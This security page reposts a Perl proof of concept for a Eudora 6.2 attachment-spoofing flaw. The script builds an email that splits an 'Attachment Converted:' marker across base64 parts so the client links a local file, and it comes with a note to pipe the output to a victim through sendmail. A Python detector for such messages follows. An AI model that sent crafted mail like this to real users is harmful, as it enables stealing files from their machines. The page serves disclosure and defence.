
Eudora 6.2 Remote Attachment Spoofing Proof of Concept

Source: www.hk20.com
Code:
#!/usr/bin/perl --

use MIME::Base64;

# Message headers; the script prints one complete multipart message.
print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.2 on Windows spoof\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";

# Plain-text body part.
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n\n";
print "With spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to). Get a warning when stealing arbitrary
files, but no warning when stealing 'attach\\existing' attachments.\n";

# First base64 part: ends without a line break, in the middle of the marker.
print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b1.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b1.txt\"\n\n";
$z = "Within base64 encoded, use missing linebreak. Part 1 ...\r
AttachmenXX";
print encode_base64($z);

# Second base64 part: carries the rest of the marker and the file path.
print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b2.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b2.txt\"\n\n";
$z = "t Converted: \"c:\\winnt\\system32\\calc.exe\"\r
... part 2\r
BTW, the above shows a parsing bug: missing two characters.\r
\r\n";
print encode_base64($z);

print "\n--zzz--\n";
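
A defender-side check for the message shape the script above produces, as an added example that is not part of the original post: it decodes every text part of an inbound message and flags an "Attachment Converted:" marker that appears either inside one part or only once two adjacent parts are joined, allowing for the two characters the post says are lost at the join. The function names, the 40-byte seam window, the constructed sample message and its placeholder path are assumptions made for this example.

```python
import base64
import re
from email import message_from_bytes

# Eudora writes this marker into its own mailbox when it saves an attachment,
# so it should never appear inside the decoded body of an inbound message.
MARKER = re.compile(rb'Attachment Converted:\s*"?([^"\r\n]+)', re.I)
MAX_SEAM_LOSS = 2  # the PoC notes two characters vanish where the parts join

def text_parts(raw):
    """Yield (name, decoded bytes) for every text/* leaf part, in order."""
    for part in message_from_bytes(raw).walk():
        if part.get_content_maintype() == "text":
            yield part.get_filename() or "(body)", part.get_payload(decode=True) or b""

def find_spoofed_markers(raw):
    """Return (kind, location, claimed_path) for each marker found."""
    findings, prev_name, prev = [], None, b""
    for name, data in text_parts(raw):
        for m in MARKER.finditer(data):
            findings.append(("in-part", name, m.group(1).decode("latin-1")))
        # Seam check: the marker only exists once the previous part's tail is
        # joined to this part's head, possibly minus a few dropped bytes.
        for lost in range(MAX_SEAM_LOSS + 1) if prev_name else ():
            tail = prev[-40:len(prev) - lost]
            m = MARKER.search(tail + data[:300])
            if m and m.start() < len(tail) < m.end():
                findings.append(("split", f"{prev_name}+{name}", m.group(1).decode("latin-1")))
                break
        prev_name, prev = name, data
    return findings

def build_sample():
    """Constructed message shaped like the page's PoC, with a placeholder path."""
    halves = [b"Part 1 ...\r\nAttachmenXX",
              b't Converted: "C:\\example\\placeholder.txt"\r\n... part 2\r\n']
    msg = ('From: a@example.test\r\nTo: b@example.test\r\nMIME-Version: 1.0\r\n'
           'Content-Type: multipart/mixed; boundary="zzz"\r\n\r\n'
           '--zzz\r\nContent-Type: text/plain\r\n\r\nplain body\r\n')
    for i, half in enumerate(halves, 1):
        msg += (f'--zzz\r\nContent-Type: text/plain; name="b{i}.txt"\r\n'
                'Content-Transfer-Encoding: base64\r\n'
                f'Content-Disposition: inline; filename="b{i}.txt"\r\n\r\n'
                + base64.b64encode(half).decode() + '\r\n')
    return (msg + '--zzz--\r\n').encode()

if __name__ == "__main__":
    for finding in find_spoofed_markers(build_sample()):
        print(finding)
```

A mail gateway or filter could quarantine any message for which `find_spoofed_markers` returns a non-empty list, since the marker has no legitimate reason to arrive from outside.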
